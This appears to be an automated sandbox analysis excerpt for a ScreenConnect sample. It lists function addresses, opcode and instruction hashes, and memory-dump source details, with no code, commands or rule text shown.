                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_6350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 8f5f021b1fdddf74859c9c26a34969523fb253a73108c7a066e4a200c0ee2835
                                                                                                                                                                                                                                          • Instruction ID: 935b970e037331e9e3e8f1224791b1f3c7faaa5ed5be78d22e34ede095403f13
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8f5f021b1fdddf74859c9c26a34969523fb253a73108c7a066e4a200c0ee2835
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 24F02D723043012BD314A729E880D6BBBDAEB80221B08857EE44ECB322DB25EC058BC0
                                                                                                                                                                                                                                          Function 01F4BCE8 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 35c2e6be80c08553596d3ab7a452d3f6e94347b58b9f4bfc3736de21c6362cad
                                                                                                                                                                                                                                          • Instruction ID: 6509175c9986b4dad73ff8ec417c2408f14211bc4064a6353a3233f8bf410543
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 35c2e6be80c08553596d3ab7a452d3f6e94347b58b9f4bfc3736de21c6362cad
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 85F08C77B0C2149FD728CABEA40169BBBEECBC4224B14C07FE54DC3740E836A4018765
                                                                                                                                                                                                                                          Function 01F46490 Relevance: .0, Instructions: 34COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 38128077a33f146ec4ad96a2da21e62bab44afa2bec06a0d97787a5f004bc864
                                                                                                                                                                                                                                          • Instruction ID: 6a87193688ae705dbfa2e8ca6b2069ed912a0a5170feb9a0f35a1a092f80c12d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 38128077a33f146ec4ad96a2da21e62bab44afa2bec06a0d97787a5f004bc864
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7AF05E313002055F9714DAADE844D5EBBEDEFC96B4710862AE509CB3A4DA71EC0587A0
                                                                                                                                                                                                                                          Function 01F4329C Relevance: .0, Instructions: 34COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 9ca3002324b3bd7746b0da4dc80a6e620edb055e77bb86367883fe1ac362d9d6
                                                                                                                                                                                                                                          • Instruction ID: 59f7b422877436b461563cba8b04bfdb70bf08e9d4ce036ec2897842e3310502
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9ca3002324b3bd7746b0da4dc80a6e620edb055e77bb86367883fe1ac362d9d6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 28F0246250D2900FD3228778B851A9D7FA4EED2210B4945DFD081CF567D659EA0AC351
                                                                                                                                                                                                                                          Function 01F4D508 Relevance: .0, Instructions: 34COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 2b6fac13baac6e2c71a0a7bc7aff26a2e8119c6c2979793f05fc6f6e1b701c0c
                                                                                                                                                                                                                                          • Instruction ID: 6e0d576cc06c03a612b45e7cd5d86c93783e9a11c2fd12a7c3e1e5b44ab5ac1f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b6fac13baac6e2c71a0a7bc7aff26a2e8119c6c2979793f05fc6f6e1b701c0c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1DF05E717002155F9714DAADE880D5BBBEDEFC86A4714862AE419CB3A4EA71EC0587E0
                                                                                                                                                                                                                                          Function 01F4FA28 Relevance: .0, Instructions: 34COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: c4351005a6a268efa4b8b7c29069d15d7186a3337e129c1611955b0e0628d3a5
                                                                                                                                                                                                                                          • Instruction ID: 8501c5108ffa9df0f02ee2313d0139a35c23ec4135fd7d6df522cd333854f09d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c4351005a6a268efa4b8b7c29069d15d7186a3337e129c1611955b0e0628d3a5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B2F0E270B407099BC6119A5FA89086BBBDEEFC4A50300842BD11DC7310DE61FC0487D0
                                                                                                                                                                                                                                          Function 044D54A8 Relevance: .0, Instructions: 34COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: b5466929665f3b6d011826932f13f4ab1d5cd5b6b1a0edf0a2d0953d382b46c4
                                                                                                                                                                                                                                          • Instruction ID: 43bc48726b577edcd09ef3e2101323fe5487a66a41476187b4577aab93f25e2d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b5466929665f3b6d011826932f13f4ab1d5cd5b6b1a0edf0a2d0953d382b46c4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 09F082353012008FD3149B19D594E967BE6DFCA725B1680AAD4498F762DA71EC43C750
                                                                                                                                                                                                                                          Function 01F4AA68 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 2553c81bb6c58a2ac29d2fbd28343b77010d99ad6d35d91ab920aef4df2b8024
                                                                                                                                                                                                                                          • Instruction ID: d54d9fe22f593b5691454655bbc3da75edc795958d63e4aaa02de42b404b10e7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2553c81bb6c58a2ac29d2fbd28343b77010d99ad6d35d91ab920aef4df2b8024
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2CF055313006404BE7141F9A78CC05ABFE6FBCCAA0704006FD60EC7302CD694C074792
                                                                                                                                                                                                                                          Function 01F431E0 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: f2ff66c3741aee06a96451b7254b69283fd5976ce7ccda43cda3556dc32128cf
                                                                                                                                                                                                                                          • Instruction ID: 376580a59d6852863a2732990fc46a9172f78b8247d65983d4d8539526377110
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f2ff66c3741aee06a96451b7254b69283fd5976ce7ccda43cda3556dc32128cf
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9DF04970D0525CEFCB45EFA8E58269CBFB0FB41340F2100AAC105A7251D7356F86CB41
                                                                                                                                                                                                                                          Function 044D4D40 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 2c53b333438e6a561dd31d1b958b8a4a8a27f955e946c4eeca4b38fa7f59becd
                                                                                                                                                                                                                                          • Instruction ID: 3c5f898411a9afcaaa8f5e04e190963cc35a58495ef38a803f668d400b5d0cc0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2c53b333438e6a561dd31d1b958b8a4a8a27f955e946c4eeca4b38fa7f59becd
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 98F05E757002015B9728AB6AA84485FFBEAEFC5665304C57FD009CB269EF36EC068BD0
                                                                                                                                                                                                                                          Function 044D3032 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 66235f9c7193b65ebbb71c6d0686b5525454e6002a7f7ecf3de4203394e922e1
                                                                                                                                                                                                                                          • Instruction ID: 1e5ed06047fcc2d5abf30c7d30fb573bf63d538fb2425b05b33bd516fba1979f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 66235f9c7193b65ebbb71c6d0686b5525454e6002a7f7ecf3de4203394e922e1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F0F0C2B098824E9FDF01DF68D92476BFFB0FB41314F00896AC60197244CB746429CB92
                                                                                                                                                                                                                                          Function 06351F10 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3300604123.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_6350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: c4244ffd33ae88dc5cbdfafa8c39153195d174cc16d9e7ba6bbce45828743450
                                                                                                                                                                                                                                          • Instruction ID: 253d0a4e7aae41e5461894ed2c3de3b0c5f9440fe939d6b67d2cfcbb9f30e7dc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c4244ffd33ae88dc5cbdfafa8c39153195d174cc16d9e7ba6bbce45828743450
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7CF082717003055B8714AB6AE880C6BBBDAEFC5221314857EE50ECB315DF76EC058BD0
                                                                                                                                                                                                                                          Function 044D3040 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 374fb3477769c13f89e229d2ac969b1efaa0f817669924ced5c1c099b8f3fe7d
                                                                                                                                                                                                                                          • Instruction ID: 5a72eb671748730f7a2fee19177972ad08e0d85381c3ae69d5aad5dc3353586e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 374fb3477769c13f89e229d2ac969b1efaa0f817669924ced5c1c099b8f3fe7d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8FF06DB0E8420ECFDF00DF68E92476EFBB4FB45354F004866C601D7254DB7525198B92
                                                                                                                                                                                                                                          Function 01F40E1F Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 491e377dbc00f1a6379524f6372baff20061b838d0297cb208e3c317ed3598df
                                                                                                                                                                                                                                          • Instruction ID: 6a6e6f75cce09242a0bad0586f889b8d95d0f0b8fd5ea73585591c5b32180eae
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 491e377dbc00f1a6379524f6372baff20061b838d0297cb208e3c317ed3598df
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 89F0BEB26002405BC3266B68A8144AE7F7AEFD2256714457FD20ACB26ADF368C068B90
                                                                                                                                                                                                                                          Function 01F431F0 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 699e90902fb6abea5626b40e90f719f0382215b6606c6e01b61fbfb7905eca39
                                                                                                                                                                                                                                          • Instruction ID: b4038a592f3c09b643fc95a3e3408c152bb48a35427f2ab6c027d167703baa6c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 699e90902fb6abea5626b40e90f719f0382215b6606c6e01b61fbfb7905eca39
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 55F0E270E0025CEFDB44EFA8D586A9CBFB5FB44345F2040AAC505A7254DB356F89CB41
                                                                                                                                                                                                                                          Function 01F4BCD9 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 2cd7200a3176953a4f9b0506edd118f7f960c94f4fae7f7362e1681ea50ee7a5
                                                                                                                                                                                                                                          • Instruction ID: 4594c966d8c88ecafbb658e5986144eba1a0773422aac05209380f70d1a61ae4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2cd7200a3176953a4f9b0506edd118f7f960c94f4fae7f7362e1681ea50ee7a5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 46F0A072A0D3405FC3299B7AA80199BBFEDCF86218B18C0BFD08CC3642D52884028726
                                                                                                                                                                                                                                          Function 01F4E2CA Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 1b38c90b66dc590cf4abf7ee03fa626b09b4049b76372ba9f3ae16170fc01d44
                                                                                                                                                                                                                                          • Instruction ID: 584ba274a7e1bcf800124e8dfdb185dd86bb18874f8dcf3f9230542136456d09
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1b38c90b66dc590cf4abf7ee03fa626b09b4049b76372ba9f3ae16170fc01d44
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DFF03A30B00114CFDB55DF6DC554AAEBBE5EF883507048069E805CB369EB39DE01CB90
                                                                                                                                                                                                                                          Function 01F4EBC0 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 8ffed8502f361c4d535f27840c7ce89ecccdb57557927dba8fc8952a4676de1c
                                                                                                                                                                                                                                          • Instruction ID: 0f19fb0377ae1e1c8f653f8b0d0dcf9c309d4ed8442b111c33c33a8438090259
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ffed8502f361c4d535f27840c7ce89ecccdb57557927dba8fc8952a4676de1c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D5E06536B04259AF4B44CA4ED800DABBFAAEFC9220718C01BF809C7305DA36D91287A4
                                                                                                                                                                                                                                          Function 01F45940 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: b7707d899e3f2083fb00de9757cc42fba70cd47c0f2cc77f02d344964f6eb472
                                                                                                                                                                                                                                          • Instruction ID: 0f9808f786bde6653606ef0015d9935b8e088f76180d5b7cad34a91e1df87703
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b7707d899e3f2083fb00de9757cc42fba70cd47c0f2cc77f02d344964f6eb472
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8DE0ED713011044BD3002BB9B87859D7FAAEBDA272320403EE50AC7282CE389C0383A1
                                                                                                                                                                                                                                          Function 06350438 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3300604123.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_6350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 635145bd01acf63fe614463f6456977825832fb157aa6cb38b3cf76b0b214adf
                                                                                                                                                                                                                                          • Instruction ID: c4c4f07a6c908bf8fcc59a02c18fda0bb60e6b5d9888038e3ae1e2831b7f4501
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 635145bd01acf63fe614463f6456977825832fb157aa6cb38b3cf76b0b214adf
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 82E0687324020023E3086A7AE841A8E76AEEBD2225B05C57FC106DF314DE7BEC0B43D4
                                                                                                                                                                                                                                          Function 01F452F0 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: b3062c4a6100473a658743d44d5e8c21dc5320229e4cc1e0184ffd1c775f3369
                                                                                                                                                                                                                                          • Instruction ID: 3895d49a1a544912b6d8e03f9869eace7a5516485fb3721c805fa5cd1e540767
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b3062c4a6100473a658743d44d5e8c21dc5320229e4cc1e0184ffd1c775f3369
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9AE0EDB2D042046FCB089AA8A4506EDBFB4EB9A210B1080AFC08DD3242D9368A028B45
                                                                                                                                                                                                                                          Function 01F4E290 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: c7a88f46bc7de08e0f5e41cd6f65cb1ac4476e656488d8b949cebf6d574e910c
                                                                                                                                                                                                                                          • Instruction ID: 056844edf5631a454d2ebd7a48853cdd05c65d79c870010d1c848eae29e50998
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c7a88f46bc7de08e0f5e41cd6f65cb1ac4476e656488d8b949cebf6d574e910c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 01F0B271E002199F8B44DFADC84069EFBF5EF49200B24806AD918E7211E331AA128B80
                                                                                                                                                                                                                                          Function 01F4AA78 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 9f6c81a6d463ef6fbee17f48a89a6e310d70f2f50b465d7cde998abce1b1e05a
                                                                                                                                                                                                                                          • Instruction ID: a846a82b7a56f77ab03d6a81c20bf4ce5610ff60c2c6f7d40a47cec73a3938b5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9f6c81a6d463ef6fbee17f48a89a6e310d70f2f50b465d7cde998abce1b1e05a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 77E086357006159BAB142A9F748C52EBADAFBCCAA1B14413EE60AC7350CEB69C0647D4
                                                                                                                                                                                                                                          Function 044D4DA0 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 217085b08111279df53794a1a39936229f7d30c7b007f41a369e61fe8e657d28
                                                                                                                                                                                                                                          • Instruction ID: 76e7f53be5ed8fae1448c2b59c8190b3320a1818597ec6298905c25fdf861088
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 217085b08111279df53794a1a39936229f7d30c7b007f41a369e61fe8e657d28
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D4F06DB2E002188FCB50DFACA9415EDBBF0EF58224B50816AC528EB341E3314B039FC0
                                                                                                                                                                                                                                          Function 01F4F96E Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
